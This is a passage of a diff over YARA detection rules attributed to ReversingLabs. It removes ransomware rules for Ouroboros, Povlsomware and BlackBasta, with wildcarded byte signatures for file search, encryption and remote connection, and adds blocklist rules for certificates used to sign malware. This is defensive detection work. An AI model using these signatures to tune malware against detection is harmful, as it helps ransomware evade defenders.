-            0F 1F 40 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ??
-            74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9
-            ?? C7 01 ?? ?? ?? ?? 66 C7 41 ?? ?? ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00
-            4D 85 E4 74 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E
-            41 5F C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( all of ( $kill_virtual_machines_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"SMART GREY\" LLC" and pe.signatures [ i ] . serial == "3b:e6:30:83:fb:b1:78:7b:44:5d:a9:75:83:72:14:19" and 1493942400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ouroboros : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6E2D3449272B6B96B8B9F728E87580D5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ouroboros ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "af0b9311-a7dd-56e8-a004-0828af5af5ef"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "6975acb9-3b37-51f5-8b4d-0d1a090a18e2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ouroboros.yara#L1-L175"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b573f303318452010ff46f21a02b6290820f9a27bf4c51b72f6ed15263b5f433"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12930-L12946"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0155a8c71bf8426bbb980798772b04c145df5b8c4b60ff1a610a1236a47547ef"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ouroboros"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
-            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-        }
-		$remote_connection_p2 = {
-            C6 45 ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 75 ?? 8D 8D ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 45 ?? C6 85 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 50 8B CE C7 06 ?? ?? ?? ?? C6 46 ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ??
-            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-        }
-		$remote_connection_p3 = {
-            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF
-            75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83
-            FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
-            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 95 ?? ?? ??
-            ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
-            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_p4 = {
-            8B 55 ?? C7 06 ?? ?? ?? ?? C6 46 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF
-            70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4
-            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
-            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 0F
-            82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8
-        }
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
-            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
-            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
-            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
-            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
-            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
-            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
-            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
-            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
-            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9
-        }
-		$encrypt_files_p1 = {
-            83 EC ?? 8B 44 24 ?? 53 55 56 8B F1 89 44 24 ?? 57 8B 7C 24 ?? 8B 6E ?? 3B FD 77 ??
-            8B DE 83 FD ?? 72 ?? 8B 1E 57 50 53 89 7E ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 04 1F ?? 8B
-            C6 5F 5E 5D 5B 83 C4 ?? C2 ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B DF 83 CB ??
-            81 FB ?? ?? ?? ?? 76 ?? BB ?? ?? ?? ?? EB ?? 8B CD B8 ?? ?? ?? ?? D1 E9 2B C1 3B E8
-            76 ?? BB ?? ?? ?? ?? EB ?? 8D 04 29 3B D8 0F 42 D8 33 C9 8B C3 83 C0 ?? 0F 92 C1 F7
-            D9 0B C8 51 8B CE E8 ?? ?? ?? ?? 57 FF 74 24 ?? 89 44 24 ?? 50 89 7E ?? 89 5E ?? E8
-            ?? ?? ?? ?? 8B 5C 24 ?? 83 C4 ?? C6 04 1F ?? 83 FD ?? 72 ?? 8B 06 45 81 FD ?? ?? ??
-            ?? 72 ?? 8B 48 ?? 83 C5 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 8B C1 55 50 E8 ?? ?? ?? ??
-            83 C4 ?? 5F 89 1E 8B C6 5E 5D 5B 83 C4 ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC
-            CC CC CC CC 83 EC ?? 53 55 8B 6C 24 ?? 56 57 8B F9 8B 4C 24 ?? 89 4C 24 ?? 8B 5F ??
-            3B EB 77 ?? 89 7C 24 ?? 8B C7 83 FB ?? 72 ?? 8B 07 89 44 24 ?? 8D 34 6D
-        }
-		$encrypt_files_p2 = {
-            89 6F ?? 56 51 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 33 C9 66 89 0C 06 8B C7 5F 5E
-            5D 5B 83 C4 ?? C2 ?? ?? 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F5 83 CE ?? 81 FE ??
-            ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B CB B8 ?? ?? ?? ?? D1 E9 2B C1 3B D8 76 ?? BE
-            ?? ?? ?? ?? EB ?? 8D 04 19 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8
-            51 8B CF E8 ?? ?? ?? ?? 89 77 ?? 8D 34 6D ?? ?? ?? ?? 56 FF 74 24 ?? 89 44 24 ?? 50
-            89 6F ?? E8 ?? ?? ?? ?? 8B 6C 24 ?? 33 C0 83 C4 ?? 66 89 04 2E 83 FB ?? 72 ?? 8B 07
-            8D 1C 5D ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 72 ?? 8B 48 ?? 83 C3 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 77 ?? 8B C1 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 2F 8B C7 5F 5E 5D 5B 83 C4 ?? C2 ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 8B 44 24 ?? 83 EC ?? 83 E0 ?? 89 41 ?? 8B 49 ??
-            23 C8 75 ?? 83 C4 ?? C2 ?? ?? 56 F6 C1 ?? 74 ?? BE ?? ?? ?? ?? EB ?? F6 C1 ?? BE ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 F0 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C
-            24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 5E
-        }
-		$encrypt_files_angus_version = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43
-            8D ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 39 8D ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 42 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( ( all of ( $encrypt_files_p* ) ) or ( $encrypt_files_angus_version ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RADIANT, OOO" and pe.signatures [ i ] . serial == "6e:2d:34:49:27:2b:6b:96:b8:b9:f7:28:e8:75:80:d5" and 1421107200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Povlsomware : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Povlsomware ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "317d7cca-4fe8-55ab-8f5f-e42be727ec26"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "0e18d9ef-e861-5583-a2a3-5f54fae8d813"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara#L1-L64"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "465dc1b1d7e9eb3091f36efb51029cd3383d05ece054e814b18f379e58c7e457"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12948-L12964"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8311b36f008e31b7ac27b439fa46da4c90ab4be6c7c89426f8e1939963bc3d7d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Povlsomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_attack = {
-            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ??
-            00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D
-            09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ??
-            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
-            13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00
-            DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC
-            28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A
-        }
-		$find_files = {
-            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ??
-            08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ??
-            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ??
-            ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00
-            DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ??
-            ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_attack ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "26:8c:0d:70:28:a1:54:ac:3b:63:49:c5" and 1474266712 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackBasta ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7a4ad567-0612-5a9c-8a06-4d615bc7e24a"
-		date = "2022-12-13"
-		modified = "2022-12-13"
+		id = "71e627d9-0892-5501-8189-26eae36b7965"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.BlackBasta.yara#L1-L293"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "79c81a4470e9eabbd714b1a91621c7b2bbe42d5371ba2c799529662d5f5c479a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12966-L12982"
